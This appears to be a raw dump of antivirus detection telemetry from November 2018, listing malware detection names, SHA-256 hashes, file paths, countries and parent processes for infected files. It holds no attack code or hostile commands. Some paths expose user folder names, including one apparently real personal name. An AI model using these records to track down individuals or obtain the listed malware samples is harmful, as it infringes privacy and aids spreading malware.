  Row(detection=Row(filename='tmp0000a692', filepath='C:\\Windows\\Temp\\8b7fc75c-b5f7-4e18-b90b-613d33923912\\tmp00000026\\tmp0000a692', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='2e6385754887c9b018acc554a8648d727635a75eabe680dc77f7187a95dac57f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160129-f6dbc099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160129-F6DBC099', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\5FFADF2A47843F8F3BF6E27F82E20DF0A6D35E7E49548EF2B2AFA6E0F3703AD7.VIR', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:57:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chars.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\chars.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24cc76317362660a7ca0b1203fcb10e4d9b4e230f77b6fcc345f49025aa26829', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\63F991F524FD3469D5A133BB028A629A67D3F9AE56E1005CDD501D2E56A46040', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111007-b7f0b4c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-110830-A4CD279A\\AVSCAN-20181102-111007-B7F0B4C7', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151441-95523004', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151441-95523004', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1b6ee61bfadee9a58d07ae09a7c5df9756034bfb43e6b6c797858aae9244d07c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\1B6EE61BFADEE9A58D07AE09A7C5DF9756034BFB43E6B6C797858AAE9244D07C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1b6ee61bfadee9a58d07ae09a7c5df9756034bfb43e6b6c797858aae9244d07c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:23:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='helppane.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-help-client_31bf3856ad364e35_6.1.7600.16385_none_6beee6458f6a465e\\HelpPane.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='21249fc5b81a6a594e78978c64a891515354b7208ad7257614c4bb804108579b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175929-2ea1f6bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-175929-2EA1F6BB', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001732-cb9eb9d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001732-CB9EB9D2', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130647-771b62f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00dd1b48\\AVSCAN-20181102-124919-AE3CAC27\\AVSCAN-20181102-130647-771B62F0', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105319-37ca7302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105319-37CA7302', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:53:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011521-9293f25d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-011458-8F5D4DD0\\AVSCAN-20181102-011521-9293F25D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='welcome.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Welcome\\Welcome.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112930-5257f3f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-112834-4D15220D\\AVSCAN-20181102-112930-5257F3F5', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:29:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081621-43802c12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081621-43802C12', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053127-83b6cdbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053127-83B6CDBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.770\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.770\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:34:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154106-19946e8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154106-19946E8F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vkilfrov.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\vKilFrOv.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183847-50012203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a43b94d3\\AVSCAN-20181102-183658-416D5F8F\\AVSCAN-20181102-183847-50012203', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:27:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:37:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2757072, timestamp='2018-11-02T22:08:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016_e8538d1a.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016_e8538d1a.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:22:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061314-5a473533', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061314-5A473533', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F8BF06B358BC43436486F2C53D19AE8E7EE08A2B9E6B46A7CC201C25534D452', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054211-03fc929e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054211-03FC929E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050714-222d5856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050714-222D5856', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061927-389237f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061927-389237F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='F:\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='--engine=2 --session-id=jf0TxkG44QhWaHZ5qIe0orelzOE8EQpI5acLb1W+ --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.174.200\\software_reporter_tool.exe', parentsize=13554808, timestamp='2018-11-02T14:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061205-30fb86bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061205-30FB86BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050313-9278b164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050313-9278B164', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050326-9a318c2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050326-9A318C2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads_dell_com', filepath='E:\\++++++++++++++++\\idm\\red\\DwnlData\\Arvin.co\\downloads_dell_com_170\\downloads_dell_com', filesize=1332000, name='HEUR/AGEN.1001862.#M1.#R1'), hash='6c746c6d314d685b6824dcc4a7edd61f20dd70f0aa23801351caa00acaa7247b', metadata=Row(cmdline='\\\\\\/onboot', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3986544, timestamp='2018-11-02T09:49:49Z'), dt=datetime.date(2018, 11, 2)),
